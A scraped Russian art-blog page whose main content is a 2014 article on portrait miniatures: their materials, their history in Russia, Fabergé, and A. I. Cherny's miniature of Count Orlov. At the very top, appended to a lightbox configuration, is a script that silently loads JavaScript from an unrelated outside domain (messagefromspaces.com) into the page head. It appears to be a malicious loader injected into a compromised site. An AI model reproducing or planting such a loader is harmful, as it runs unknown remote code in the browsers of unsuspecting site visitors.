, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Миниатюрный портрет

Автор: Дмитрий Алмазов | 07 Июл 2014

Портрет графа ОрловаНам все известно слово миниатюра. Оно обозначает небольшой, уменьшенный формат чего-либо. Тогда напрашивается вопрос: миниатюрный портрет - это маленькое изображения человека? Или нет? Давайте все же разбираемся с этим жанром живописи.

Портретная миниатюра - это изображение человека на холсте размером от 1,5 сантиметра до 20 сантиметров. Впервые данный жанр появился в эпоху Возрождения. Холст портрета может быть выполнен из любого материала: пергамента, бумаги, картона, фарфора, металла, слоновой кости. Академической портретной миниатюрой считается миниатюра, выполненная на тонкой пластинке из слоновой кости. Виды красок, которыми расписывается портретная миниатюра, очень разнообразны: они и акварельные, и гуашные, и масляные и даже эмалевые. Форма небольшого изображения выполнялась по желанию заказчика и могла быть абсолютно любой. Но почему многие предпочитали стандартные формы: круг, овал, квадрат, восьмиугольник. Сюжет холста мог быть, безусловно, любым. В большинстве случаев господствовал сюжет романтического содержания. На портрете могли присутствовать до пяти человек. Некоторые творцы умудрялись написать на небольшом холсте семью из десяти человек. Тона и оттенки были всяческие. Опять же все зависело от желания и средств заказчика.

Особого алгоритма для миниатюры не было, каждый художник делал все по собственному велению души. Чаще всего портретную миниатюру делали наказ. Ведь небольшое изображение много быть вставлено в медальон, брошь, браслет, часы. Главными заказчиками были влюбленные пары, которые заказывали сразу по две миниатюры.
Кстати, хочу привести вам интересный факт. Фирма Карла Фаберже начинала свою деятельность именно с портретных миниатюр для состоятельных господ, а уже после стала делать свои знаменитые ювелирные творения.

В Российскую империю портретная миниатюра была завезена Петром. Первым и имела необычный успех у дворянской знати. За первые 50 лет существо них портретной миниатюры в России, жанр смог достичь небывалого величия. В Академии художеств открыли специальный класс для подготовки мастеров портретной миниатюры. Из них получились яркие представители данного жанра. Это А. П. Рокштуль (с 1840 г. — академик миниатюрной живописи), А. Х. Ритт, Д. И. Евреинов, В. Л. Боровиковский, А. И. Черный. Из всех вышеперечисленных творцов я хочу выделить работы Черного, который трудился в жанре парадного, миниатюрного портрета. Самой яркой его работой является портрет графа Григория Орлова. Фаворит предстает перед нами в блестящих, насыщенных тонах в прекрасном одеянии. Существует легенда, что данная миниатюра была создана для Екатерины Великой. Правда это или нет, мы может только догадываться, но увидеть воочию данный портрет можно в  государственном музее "Эрмитаж".

Возможно, что сейчас портретная миниатюра неактуальна. Но она все равно остается ценной для любого поколения в качестве одно из символов прошлого.

Темы: Портрет | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress